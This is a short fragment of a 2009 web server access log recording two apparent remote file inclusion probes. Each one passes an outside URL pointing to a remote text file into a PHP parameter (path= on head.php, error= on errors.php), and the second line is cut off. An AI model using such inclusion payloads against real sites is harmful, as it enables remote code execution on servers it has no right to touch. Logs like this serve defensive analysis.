201.217.51.191 - - [26/Jul/2009:14:34:50 -0700] "GET /logs/access_080509.log//citywriter/head.php?path=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:14:35:18 -0700] "GET /errors.php?error=http://www.die-grenzreiter.com/content/downloa